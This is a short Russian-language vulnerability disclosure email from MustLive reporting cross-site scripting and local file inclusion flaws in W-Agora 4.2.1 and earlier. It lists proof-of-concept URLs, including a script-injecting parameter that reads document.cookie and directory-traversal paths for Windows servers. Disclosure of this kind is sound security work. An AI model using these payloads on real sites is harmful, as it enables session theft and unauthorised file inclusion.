Здравствуйте 3APA3A!
Сообщаю вам о найденных мною новых Cross-Site Scripting и Local File
Inclusion уязвимостях в W-Agora.
XSS (WASC-08):
http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
Уязвимость работает в версии 4.1.5, но не работает в 4.2.1.
http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
Local File Inclusion (WASC-31):
Можно инклюдить php-файлы (с расширением php3 в версии W-Agora 4.1.5 или с
расширением php в версии 4.2.1).
В папке conf:
http://site/news/for-print.php3?bn=1
http://site/news/login.php3?bn=1
В любой папке (только на Windows-серверах):
http://site/news/for-print.php3?bn=..\1
http://site/news/login.php3?bn=..\1
Уязвимы W-Agora 4.2.1 и предыдущие версии. В последних версиях системы
скрипты php3 имеют расширение php.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4484/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua